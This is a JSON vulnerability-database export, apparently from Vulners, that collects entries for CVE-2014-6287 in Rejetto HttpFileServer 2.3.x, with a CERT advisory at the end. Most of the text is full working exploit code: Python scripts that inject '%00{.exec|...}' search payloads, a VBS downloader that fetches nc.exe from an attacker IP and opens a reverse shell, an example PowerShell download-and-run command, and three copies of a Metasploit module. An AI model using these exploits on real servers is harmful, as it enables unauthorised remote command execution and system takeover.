"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6287"], "description": "\r\n\r\nAffected software: http://sourceforge.net/projects/hfs/\r\nVersion : 2.3x\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:"httpfileserver 2.3"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\r\n\r\n", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31217", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31217", "title": "HttpFileServer 2.3.x Remote Command Execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-13T09:41:32", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-09-13T00:00:00", "type": "zdt", "title": "HttpFileServer 2.3.x Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-13T00:00:00", "id": "1337DAY-ID-22640", "href": "https://0day.today/exploit/description/22640", "sourceData": "Affected software: http://sourceforge.net/projects/hfs/\r\nVersion : 2.3x\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22640"}, {"lastseen": "2018-03-12T18:41:22", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2016-01-04T00:00:00", "type": "zdt", "title": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "1337DAY-ID-25379", "href": "https://0day.today/exploit/description/25379", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 04-01-2016\r\n# Remote: Yes\r\n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\"\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n# Description: You can use HFS (HTTP File Server) to send and receive files.\r\n# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.\r\n# It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \r\n \r\n#Usage : python Exploit.py <Target IP address> <Target Port Number>\r\n \r\n#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). \r\n# You may need to run it multiple times for success!\r\n \r\n \r\nimport urllib2\r\nimport sys\r\n \r\ntry:\r\n def script_create():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\")\r\n \r\n def execute_script():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\")\r\n \r\n def nc_run():\r\n urllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\")\r\n \r\n ip_addr = \"192.168.44.128\" #local IP address\r\n local_port = \"443\" # Local Port number\r\n vbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\"\r\n save= \"save|\" + vbs\r\n vbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\"\r\n exe= \"exec|\"+vbs2\r\n vbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port\r\n exe1= \"exec|\"+vbs3\r\n script_create()\r\n execute_script()\r\n nc_run()\r\nexcept:\r\n print \"\"\"[.]Something went wrong..!\r\n Usage is :[.] python exploit.py <Target IP address> <Target Port Number>\r\n Don't forgot to change the Local IP address and Port number on the script\"\"\"\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25379"}, {"lastseen": "2018-03-02T03:39:56", "edition": 2, "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This Metasploit module exploit the HFS scripting commands by using '%00' to bypass the filtering. This Metasploit module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.", "published": "2014-10-09T00:00:00", "type": "zdt", "title": "Rejetto HttpFileServer Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-09T00:00:00", "id": "1337DAY-ID-22733", "href": "https://0day.today/exploit/description/22733", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\r\n 'Description' => %q{\r\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\r\n poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by\r\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\r\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\r\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6287'],\r\n ['OSVDB', '111386'],\r\n ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],\r\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\r\n ],\r\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => \"Sep 11 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/'\r\n })\r\n\r\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\r\n version = $1\r\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n exe = generate_payload_exe\r\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\r\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\r\n # remove resource after serving 1st request as 'exec' execute 4x\r\n # during exploitation\r\n remove_resource(get_resource)\r\n end\r\n\r\n def primer\r\n file_name = rand_text_alpha(rand(10)+5)\r\n file_ext = '.vbs'\r\n file_full_name = file_name + file_ext\r\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\r\n\r\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\r\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\r\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\r\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\r\n vbs_code << \"wsh.exit\\x0d\\x0a\"\r\n vbs_code << \"End If\\x0d\\x0a\"\r\n vbs_code << \"x.Send\\x0d\\x0a\"\r\n vbs_code << \"Execute x.responseText\"\r\n\r\n payloads = [\r\n \"save|#{vbs_path}|#{vbs_code}\",\r\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\r\n ]\r\n\r\n print_status(\"Sending a malicious request to #{target_uri.path}\")\r\n payloads.each do |payload|\r\n send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\r\n })\r\n end\r\n register_file_for_cleanup(vbs_path)\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\nend\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22733"}], "exploitdb": [{"lastseen": "2016-02-03T23:42:43", "description": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1). CVE-2014-6287. Remote exploit for windows platform", "published": "2014-09-15T00:00:00", "type": "exploitdb", "title": "Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-15T00:00:00", "id": "EDB-ID:34668", "href": "https://www.exploit-db.com/exploits/34668/", "sourceData": "# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/?search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\r\n\r\n\r\n## EDB Note: This vulnerability will run the payload multiple times simultaneously. \r\n## Make sure to take this into consideration when crafting your payload (and/or listener).", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34668/"}, {"lastseen": "2016-02-04T00:13:49", "description": "Rejetto HttpFileServer Remote Command Execution. CVE-2014-6287. Remote exploit for windows platform", "published": "2014-10-09T00:00:00", "type": "exploitdb", "title": "Rejetto HttpFileServer Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-09T00:00:00", "id": "EDB-ID:34926", "href": "https://www.exploit-db.com/exploits/34926/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\r\n 'Description' => %q{\r\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\r\n poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by\r\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\r\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\r\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6287'],\r\n ['OSVDB', '111386'],\r\n ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],\r\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\r\n ],\r\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => \"Sep 11 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/'\r\n })\r\n\r\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\r\n version = $1\r\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n exe = generate_payload_exe\r\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\r\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\r\n # remove resource after serving 1st request as 'exec' execute 4x\r\n # during exploitation\r\n remove_resource(get_resource)\r\n end\r\n\r\n def primer\r\n file_name = rand_text_alpha(rand(10)+5)\r\n file_ext = '.vbs'\r\n file_full_name = file_name + file_ext\r\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\r\n\r\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\r\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\r\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\r\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\r\n vbs_code << \"wsh.exit\\x0d\\x0a\"\r\n vbs_code << \"End If\\x0d\\x0a\"\r\n vbs_code << \"x.Send\\x0d\\x0a\"\r\n vbs_code << \"Execute x.responseText\"\r\n\r\n payloads = [\r\n \"save|#{vbs_path}|#{vbs_code}\",\r\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\r\n ]\r\n\r\n print_status(\"Sending a malicious request to #{target_uri.path}\")\r\n payloads.each do |payload|\r\n send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\r\n })\r\n end\r\n register_file_for_cleanup(vbs_path)\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34926/"}, {"lastseen": "2020-11-30T08:29:49", "description": "", "published": "2020-11-30T00:00:00", "type": "exploitdb", "title": "Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2020-11-30T00:00:00", "id": "EDB-ID:49125", "href": "https://www.exploit-db.com/exploits/49125", "sourceData": "# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 28-11-2020\r\n# Remote: Yes\r\n# Exploit Author: \u00d3scar Andreu\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\n#!/usr/bin/python3\r\n\r\n# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>\r\n# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 \"c:\\windows\\SysNative\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')\"\r\n\r\nimport urllib3\r\nimport sys\r\nimport urllib.parse\r\n\r\ntry:\r\n\thttp = urllib3.PoolManager()\t\r\n\turl = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'\r\n\tprint(url)\r\n\tresponse = http.request('GET', url)\r\n\t\r\nexcept Exception as ex:\r\n\tprint(\"Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command\")\r\n\tprint(ex)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49125"}, {"lastseen": "2016-02-04T09:37:29", "description": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution. CVE-2014-6287. Remote exploit for windows platform", "published": "2016-01-04T00:00:00", "type": "exploitdb", "title": "Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "EDB-ID:39161", "href": "https://www.exploit-db.com/exploits/39161/", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 04-01-2016\r\n# Remote: Yes\r\n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\"\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n# Description: You can use HFS (HTTP File Server) to send and receive files.\r\n#\t It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.\r\n#\t It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \r\n \r\n#Usage : python Exploit.py <Target IP address> <Target Port Number>\r\n\r\n#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). \r\n# You may need to run it multiple times for success!\r\n\r\n\r\nimport urllib2\r\nimport sys\r\n\r\ntry:\r\n\tdef script_create():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\")\r\n\r\n\tdef execute_script():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\")\r\n\r\n\tdef nc_run():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\")\r\n\r\n\tip_addr = \"192.168.44.128\" #local IP address\r\n\tlocal_port = \"443\" # Local Port number\r\n\tvbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\"\r\n\tsave= \"save|\" + vbs\r\n\tvbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\"\r\n\texe= \"exec|\"+vbs2\r\n\tvbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port\r\n\texe1= \"exec|\"+vbs3\r\n\tscript_create()\r\n\texecute_script()\r\n\tnc_run()\r\nexcept:\r\n\tprint \"\"\"[.]Something went wrong..!\r\n\tUsage is :[.] python exploit.py <Target IP address> <Target Port Number>\r\n\tDon't forgot to change the Local IP address and Port number on the script\"\"\"\r\n\t\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39161/"}], "metasploit": [{"lastseen": "2020-10-07T23:31:51", "description": "Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.\n", "published": "2014-10-08T16:55:33", "type": "metasploit", "title": "Rejetto HttpFileServer Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/HTTP/REJETTO_HFS_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\n 'Description' => %q{\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-6287'],\n ['OSVDB', '111386'],\n ['URL', 'https://seclists.org/bugtraq/2014/Sep/85'],\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\n ],\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n ],\n 'Privileged' => false,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DisclosureDate' => '2014-09-11',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\n ])\n end\n\n def check\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => '/'\n })\n\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\n version = $1\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def on_request_uri(cli, req)\n print_status(\"Payload request received: #{req.uri}\")\n exe = generate_payload_exe\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\n # remove resource after serving 1st request as 'exec' execute 4x\n # during exploitation\n remove_resource(get_resource)\n end\n\n def autofilter\n true\n end\n\n def primer\n file_name = rand_text_alpha(rand(10)+5)\n file_ext = '.vbs'\n file_full_name = file_name + file_ext\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\n\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\n vbs_code << \"wsh.exit\\x0d\\x0a\"\n vbs_code << \"End If\\x0d\\x0a\"\n vbs_code << \"x.Send\\x0d\\x0a\"\n vbs_code << \"Execute x.responseText\"\n\n payloads = [\n \"save|#{vbs_path}|#{vbs_code}\",\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\n ]\n\n print_status(\"Sending a malicious request to #{target_uri.path}\")\n payloads.each do |payload|\n send_request_raw({\n 'method' => 'GET',\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\n })\n end\n register_file_for_cleanup(vbs_path)\n end\n\n def exploit\n begin\n Timeout.timeout(datastore['HTTPDELAY']) { super }\n rescue Timeout::Error\n # When the server stops due to our timeout, this is raised\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/rejetto_hfs_exec.rb"}], "cert": [{"lastseen": "2020-09-18T20:41:30", "bulletinFamily": "info", "cvelist": ["CVE-2014-6287"], "description": "### Overview \n\nRejetto HTTP File Server (HFS) search feature in versions 2.3, 2.3a, and 2.3b fails to handle null bytes.\n\n### Description \n\n[](<http://cwe.mitre.org/data/definitions/185.html>)[**CWE-158**](<http://cwe.mitre.org/data/definitions/158.html>)**: Improper Neutralization of Null Byte or NUL Character** \\- CVE-2014-6287\n\nRejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in `parserLib.pas` that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system. As an example, the following search submitted to a vulnerable HFS instance launches calculator on the host Microsoft Windows system: \n \nhttp://<vulnerable instance>/?search==%00{.exec|calc.} \n \nNote that this vulnerability is being exploited in the wild. A Metasploit module has been released to exploit this vulnerability. \n \n--- \n \n### Impact \n\nA remote, unauthenticated user may be able to run arbitrary operating system commands on the server. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in HFS version 2.3c and later, [available here](<http://www.rejetto.com/hfs/?f=dl>). \n \n--- \n \n### Vendor Information\n\n251276\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: 